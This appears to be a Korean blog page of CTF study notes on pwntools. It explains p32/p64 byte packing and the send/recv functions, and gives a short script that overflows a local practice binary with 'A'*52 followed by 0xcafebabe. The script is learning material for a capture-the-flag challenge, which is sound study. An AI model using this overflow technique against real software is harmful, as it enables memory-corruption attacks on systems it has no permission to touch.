| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | 2 | 3 | 4 | |||
| 5 | 6 | 7 | 8 | 9 | 10 | 11 |
| 12 | 13 | 14 | 15 | 16 | 17 | 18 |
| 19 | 20 | 21 | 22 | 23 | 24 | 25 |
| 26 | 27 | 28 | 29 | 30 | 31 |
- gdb
- phase_5
- phase_3
- IDS
- reversingg
- 명령어
- 밤랩
- mandb
- Bomb
- 스테가노
- phase_1
- phase_2
- binarybomb
- bomblab
- bomb lab
- 툴
- phase_6
- 데이터 형태
- 침입감지시스템
- pwnable
- 디렉터리
- phase_4
- 파일
- 서브모터
- 아두이노
- Reversing
- 리버싱
- pwntool
- Linux
- 리눅스
- Today
- Total
목록pwntool (4)
Flag={C0MPU73R}
from pwn import * p = process("./파일명") #로컬에 있는 파일 선택print(p.recvline()) #이 파일에서 출력하는거 한줄 출력 p.sendline("A"*52 + p32(0xcafebabe)) #파일에 ()안에 있는걸 입력 p.interactive() #상호작용p.close() ------------------------------------------실행 방법 $ (python EX.py; cat) | ./파일명
알아서 두개씩 끊어서 순서 바꿔줌 32bit원래 0x1234는 0x00001234 p32(0x1215)-> \x34\x12\x00\x00 64bit원래 0x1234는 0x0000000000001234 p64(0x1215)-> \x34\x12\x00\x00\x00\x00\x00\x00 ----------------------------------- p32(0xcafebabe)-> \xbe\xba\xfe\xca
conn.send(data) 데이터를 전송. data는 string형 conn.sendline(data)데이터를 전송하되, 마지막에 개행문자 ("\n")를 붙입니다.send(data + "\n")과 동일합니다. conn.recv(numb=4096, timeout=default)받은 데이터를 numb만큼 str로 반환합니다.r.recv(1024)처럼 사용할 수 있습니다. conn.recvline()한 줄을 받아서 반환합니다. conn.recvuntil(data)data가 나올때까지 받은 모든 데이터를 반환합니다.